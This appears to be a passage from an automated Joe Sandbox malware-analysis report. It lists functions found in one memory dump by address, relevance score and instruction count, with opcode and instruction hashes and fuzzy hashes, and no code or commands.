                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: [$]
                    • API String ID: 0-2073744556
                    • Opcode ID: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction ID: f2ca12b2de72c029f0608a164e1852f6746197881347641913b939b8d5fb123c
                    • Opcode Fuzzy Hash: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction Fuzzy Hash: 67810870D19A6D8FDBA9EF18C8856A9B7B1FF58341F1041EAD00DE7291CB356A81CF50
                    Function 00007FF848F31751 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: @JH
                    • API String ID: 0-3316324915
                    • Opcode ID: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction ID: e0750ef981e6eeff0d2682ad236e1505d2b70d5e482981af7937900177e07d1e
                    • Opcode Fuzzy Hash: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction Fuzzy Hash: 59D18C71C196999FDB98EB68C8557F8BBB1FF55340F1400BAE009E72D2CB386885CB14
                    Function 00007FF848F3124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction ID: fe47509d000de397c1de0b066bda96767c29271a00c15e57403c1d64ed9fc325
                    • Opcode Fuzzy Hash: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction Fuzzy Hash: 71A17234A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AD81CB00
                    Function 00007FF848F309D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: f6c667cf95328bef497624ff99ed54d779e6b87a76af194c3808cfaea668cd32
                    • Instruction ID: f3560c120562cd1cc05d1670db6d10e5ef24c5208aa4509318ddc425be3ca472
                    • Opcode Fuzzy Hash: f6c667cf95328bef497624ff99ed54d779e6b87a76af194c3808cfaea668cd32
                    • Instruction Fuzzy Hash: AAE09A36D1892E8FDB84FB58D8595FC7361FB94250F010527D54DD7181DB2468158744
                    Function 00007FF848F34843 Relevance: .2, Instructions: 248COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c7bcd78628156a731e656f3f47d4499f2494354a906e19062ae360b850a68845
                    • Instruction ID: 1afbe0f881c0ac749b570308f90b70d8976a5382f3d1f962d151d86c91b6dbe7
                    • Opcode Fuzzy Hash: c7bcd78628156a731e656f3f47d4499f2494354a906e19062ae360b850a68845
                    • Instruction Fuzzy Hash: 4391F270D19A1D9FDB94EFA8D845BEDB7B1FF58340F1041AAD00DE3292DB38A9858B44
                    Function 00007FF848F34345 Relevance: .2, Instructions: 239COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a84ab24c650e363b5c48a53e9490dc7a75cd7c156d660cc496a3439d39e3c106
                    • Instruction ID: 04ceb03bdaf79776c51f24de7b0350a25bf5118240be395e35b5ae00a491fdb0
                    • Opcode Fuzzy Hash: a84ab24c650e363b5c48a53e9490dc7a75cd7c156d660cc496a3439d39e3c106
                    • Instruction Fuzzy Hash: A7814C72C1E6C65FE355ABA8A8110B97FA0FF72794F1800BBD44C871D7DF19A8098399
                    Function 00007FF848F30DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 013057195cf6704f6b1af90e8727034ddf3377c0344f0c8dbd9b7b7fbf4175e0
                    • Instruction ID: a79ba922fe5ff3b5f96646a4d510a5dfbec5b59b4c2258b766885a73f1695ca4
                    • Opcode Fuzzy Hash: 013057195cf6704f6b1af90e8727034ddf3377c0344f0c8dbd9b7b7fbf4175e0
                    • Instruction Fuzzy Hash: E3715C30A1994E8FDB84FF58C895AE9B7B1FF98340F1445A6D409D7296CA38A881CB90
                    Function 00007FF848F308B1 Relevance: .2, Instructions: 201COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 479704c342f9183ed99d7219fc4f1be8016b76d3f61d11c07321c60e8378e563
                    • Instruction ID: 597e8065ae4164f4d4a05c3576a175b99db90b7bb33f2f92dc9b3d66bbf06dab
                    • Opcode Fuzzy Hash: 479704c342f9183ed99d7219fc4f1be8016b76d3f61d11c07321c60e8378e563
                    • Instruction Fuzzy Hash: 40519E3191DA4E8FEB98FF68C8586A9BBA1FF94340F0401BBD409D72D2DB34A841C744
                    Function 00007FF848F34F5C Relevance: .2, Instructions: 193COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 184ee55672e228a7b1ad15eadfad5ada4e5da134e700715405eab322e9ce3306
                    • Instruction ID: bee5cb8306d270359c27266689ee4098ea76bd20baf79fa6f37219161ba6bd5e
                    • Opcode Fuzzy Hash: 184ee55672e228a7b1ad15eadfad5ada4e5da134e700715405eab322e9ce3306
                    • Instruction Fuzzy Hash: 8471C270D09A2C9FDBA5EF58C895BE9B7F1FB58304F5001AAD00DE7291DB35AA84CB44
                    Function 00007FF848F360C5 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cd61dbce42bf359eeb334423a74060005f240044b22047a342750ce143dcbd8
                    • Instruction ID: 8783ed5f8d53b1222c42844ba79d5ad913d321441393eb9df4d5b67c784182b7
                    • Opcode Fuzzy Hash: 2cd61dbce42bf359eeb334423a74060005f240044b22047a342750ce143dcbd8
                    • Instruction Fuzzy Hash: DD51AB70C0CA598FEB96FB6888593A87BB1FF55340F4441BAC009D72C6DB3CA988DB41
                    Function 00007FF848F3190D Relevance: .2, Instructions: 173COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction ID: c889798b965f0532f045d3c4d93a7625c5f30e6d53abd3118b7b0b6ab1a697aa
                    • Opcode Fuzzy Hash: 668a4ff864c44c21781ed50264ff871fd35401159c53e8451de6ce7efef622a7
                    • Instruction Fuzzy Hash: D751CA71D1955D9FDB98EB58C895BA8B7B1FF58340F1440BAD00DE7296CF38A880CB04
                    Function 00007FF848F34611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a002653f76617870b94f37a6153497458471ff45141f6864bc8a1e6550a3ef48
                    • Instruction ID: 23d0740155b59fce3dde99ac752f696ea00c9d1e07bd4d407fd9844dd219406f
                    • Opcode Fuzzy Hash: a002653f76617870b94f37a6153497458471ff45141f6864bc8a1e6550a3ef48
                    • Instruction Fuzzy Hash: 5751B270E19A1D8FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB386941CB44
                    Function 00007FF848F30AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction ID: 809f0658bda65252b931ee3cb1367d0d1c2a7b64def4d590c15d18ee87a1c388
                    • Opcode Fuzzy Hash: 56051f872494983489999da76f5189d60c2ad33b9e5fb8af54dd03bbca6e0986
                    • Instruction Fuzzy Hash: 0451E370D18A5D8FDB98EF98C8986EDBBB1FFA8341F14012BD409E7295CB74A845CB44
                    Function 00007FF848F338B8 Relevance: .2, Instructions: 151COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5cefab42f2ea809d4ed645192f62bf342521e2527a1e30ec2be3acc53649c838
                    • Instruction ID: 98aefedd04b97fe6720fe2be99ba296e5c89ecb9faa21923937a04a6d5bba1cf
                    • Opcode Fuzzy Hash: 5cefab42f2ea809d4ed645192f62bf342521e2527a1e30ec2be3acc53649c838
                    • Instruction Fuzzy Hash: 36419C70E1DA1D9FDB44EF98D855AEEBBB0FF58340F10017AD00AE7281DB38A9058B55
                    Function 00007FF848F367ED Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f27816a0f6082c0d22a8acd1ec3716b8c51d520fbffeea9e9053c2b834ba4351
                    • Instruction ID: 30cabc64033de921a05d4f87ecbb2aed161d68c80e636d79ca336e641c4ea79a
                    • Opcode Fuzzy Hash: f27816a0f6082c0d22a8acd1ec3716b8c51d520fbffeea9e9053c2b834ba4351
                    • Instruction Fuzzy Hash: 8951783180E7898FDB55AB6498682FE7BB0EF1A311F1501BBD004E71D2EB385A48DB52
                    Function 00007FF848F3535F Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3fdea5d52772392c5ab68ba8001e694b049aeded929d43242078c8facdec5c36
                    • Instruction ID: 1d7335e3834c11718d95f36d4b3567b3be852eb4813cf37f6a9a269d9ce79013
                    • Opcode Fuzzy Hash: 3fdea5d52772392c5ab68ba8001e694b049aeded929d43242078c8facdec5c36
                    • Instruction Fuzzy Hash: D541E970D1895D9FDF94EBA8D895AACBBF1FF68341F50016AD00DE7296DB34A881CB40
                    Function 00007FF848F30C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a1154a172c77fc383aab8bf64a1fa5f1ae24023383ef4137f8275ed54984cbd4
                    • Instruction ID: 33f806684bf9a6245b6b5b2a0657fc1ed802270bea18354e5d1158dc490f1204
                    • Opcode Fuzzy Hash: a1154a172c77fc383aab8bf64a1fa5f1ae24023383ef4137f8275ed54984cbd4
                    • Instruction Fuzzy Hash: D0410271C09A1D8FDB80FFA8D4486EDBBB0FF55340F50046AE409E7292DB78A941CB84
                    Function 00007FF848F31521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction ID: 3ce9ae0f0bc889c1ba0d051b8ba53bf9d293bf343efe3b03bcef4eb6863704e0
                    • Opcode Fuzzy Hash: 7dad90c35a913a91806231750b7cf3752ce9d31dc0c6b1cbc2e4b04d23d52bde
                    • Instruction Fuzzy Hash: D541D634A1891D8FDF98EB58C895BACB7F1FF58344F5440AAE04EE3291DF74A9818B40
                    Function 00007FF848F30AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction ID: 3952733efa99eb53d29e263af2b8324039295f9366fb1665ca29fd00bfaac9b5
                    • Opcode Fuzzy Hash: 185bafd8b6f801025c41950a184689b195e662046426f1d0f2b0e7816fe02c23
                    • Instruction Fuzzy Hash: 0A31C770D18A1D9FDF94EF58D885BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F34BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33e0cc8213508be2ae73b367c5853ce787f1724307e2cf807645ab43d51191d5
                    • Instruction ID: 7ea9f34dd628b169fff10fd9a88206f666e8006bce67f7904b0202ebebb110f6
                    • Opcode Fuzzy Hash: 33e0cc8213508be2ae73b367c5853ce787f1724307e2cf807645ab43d51191d5
                    • Instruction Fuzzy Hash: BE417C70D0DA598FE756EBA4C8586EDBBF1FF69340F5001BAD009D7292CB385981CB40
                    Function 00007FF848F31129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction ID: 1831f3a81f698f656277480ea69a602120ad24bf07fb9db6a6501f22f22de6a4
                    • Opcode Fuzzy Hash: 24341bd063709b7bbcda917365c7fad30c847e8dff0c0bd4aed77d5c3bd60959
                    • Instruction Fuzzy Hash: 40217C3190895D9FDB81EF68D855AEDBBF5FF58310F00016BE408E3291CA249841C790
                    Function 00007FF848F33A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction ID: c3d9a1e0fd0a256aca4248eb905369a6f008b040638b3d8b7591eeebeaf255d1
                    • Opcode Fuzzy Hash: b3cd772792b14d0220d7effd9ceffa48aab84d2dbf7416f854d553f505f1ddb6
                    • Instruction Fuzzy Hash: C021DE72E0DA8E8FEB95EB289C642A5BBA1FF41341F0801BAD048D72D2DF396841C740
                    Function 00007FF848F34555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 92597205ced1821cf3e7e409e6c34465b2686427e334d6f6eb6777e1eb2c14ec
                    • Instruction ID: 4bdc206506c5cfe85e648840de996c22feeaa6437e4240a0ed091cc465e80e6b
                    • Opcode Fuzzy Hash: 92597205ced1821cf3e7e409e6c34465b2686427e334d6f6eb6777e1eb2c14ec
                    • Instruction Fuzzy Hash: 5531E071C1E6C98FE795EF2888142A97FB0FFA6240F5501BBE408C32D7CB289844C799
                    Function 00007FF848F33F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction ID: 5759e07d036be748c542f5c3b3754883320783fccf4dd12e483c2842513270f2
                    • Opcode Fuzzy Hash: 42f4d21ce0fcbd75e36a720f4eb8c7e208ff09149967d201fb19091555286ec2
                    • Instruction Fuzzy Hash: FF314A30D0961A8FE7A8EB28C8593B9B7B1EF94350F1005BAD45DD72D2CF39A981CB44
                    Function 00007FF848F33F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction ID: 6e1b73648d3be654aa84de8a46bd408c1c58b9d7a5ab29aab687c53847492de9
                    • Opcode Fuzzy Hash: 8e948658f711d28b4a72f173c5c28842ef5d17fd87bae9d950e642ef384bc58d
                    • Instruction Fuzzy Hash: 87219D31E0D20A9EE768EB68D8456B9B3B1EF95350F10047AD51D932D2CF39A981CB44
                    Function 00007FF848F31048 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction ID: df27113ec3b048840facd19d0c22ad48332518d2f5b6236fc905511555b8a4b5
                    • Opcode Fuzzy Hash: f6de1c39f3c61c08f256f571ae015e07cd6bb650836d9e5be3498c178c0ef4e0
                    • Instruction Fuzzy Hash: B3219274A1891D9FDF84EF48D495EEEBBB1FF68301F10416AE509E3255CB34E8418B94
                    Function 00007FF848F33F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction ID: d11e549175d7a161452aa2c3c8ba34709b03ef6e208cb99b2aa55082e00d3c74
                    • Opcode Fuzzy Hash: 84a2c4896f2908762eee6424abc0d63750192936118100ad0c93f276ae0e6c58
                    • Instruction Fuzzy Hash: A3219A30D0E7898FE769EB68C8197B9BBB0EF56350F0400BAD009D32D2CE389884CB51
                    Function 00007FF848F33FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction ID: 90ee1616f1261fb80d70e4f63fc0f983706d79182bb91efdba4ffcfe1fc8b1b2
                    • Opcode Fuzzy Hash: 3067a960245212ae32d0b2534974d4730b46238c1c99dfa298dd40864f88d04a
                    • Instruction Fuzzy Hash: A411EF7090E78E4FE766AB7488247B97FB1EF96710F0804BAD049D72C3CE289844C751
                    Function 00007FF848F33F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction ID: f79f5d11ffadb5da644a9d5774be393b1c4441713a5af5ba1352b6aa2f7b4c3c
                    • Opcode Fuzzy Hash: 5acbeb819a5d047513eb37b013558d8df2f2d8f97c42e811f1c122622ab005ea
                    • Instruction Fuzzy Hash: 14119E30D0D60A9FE768EB68C4097BAB6B1EFA5790F10153AE40DD32C1CF39A8448A55
                    Function 00007FF848F33F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction ID: 8e38062f09769db64c0bd6bf2843b831148c890b329d31ba5b7d4e2bcbbed7fe
                    • Opcode Fuzzy Hash: e4fd26ce6ceed72704ccacbfab46f61279af681a88b1d25819949b929121af89
                    • Instruction Fuzzy Hash: EE114C74D0D64A8EE7A8FF68D4153B977B1EFA9790F14143AD40D972C6CF39A8818B08
                    Function 00007FF848F33F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction ID: c67585e6f566ef50767a98c6eb0adc7a1b2b3499f58b97886dc01000fd7beb40
                    • Opcode Fuzzy Hash: 5095f12c18daf664fee1a4213ea117355f81cdd4c2f35178e10e48ac166803dc
                    • Instruction Fuzzy Hash: D3118E70D0DA4A8FE7A8EF68C4153B9B7B1EF98750F54043AD40DD72C2CF39A8818648
                    Function 00007FF848F33EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction ID: cd71f1c24c82e119973dd14bd70e1059ca1edd7a327691b2d0d062028a86ca1a
                    • Opcode Fuzzy Hash: 64c1158d1a6aedcebd901c33846296404108b6622ae41303f7aa5351e15dbd80
                    • Instruction Fuzzy Hash: EC11A070D0E74A8FE769EB28C5193B9BBB1EF56750F04147AE419D72D2CF3968408705
                    Function 00007FF848F33F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction ID: 0b8aeb4af75e0a14b7f351bf0bcfc3ea94ac8e69750e3d0b95e95ea1c28b2391
                    • Opcode Fuzzy Hash: fef288c496fc1a0d8f349e3f9f928a308b21917160d86fd485b9fe94de7c0282
                    • Instruction Fuzzy Hash: DD016970D0E64A8FE768EB64C5193B9BBB1EF99750F04187AD009E72D2CF39A8418B15
                    Function 00007FF848F36680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000015.00000002.2454197429.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
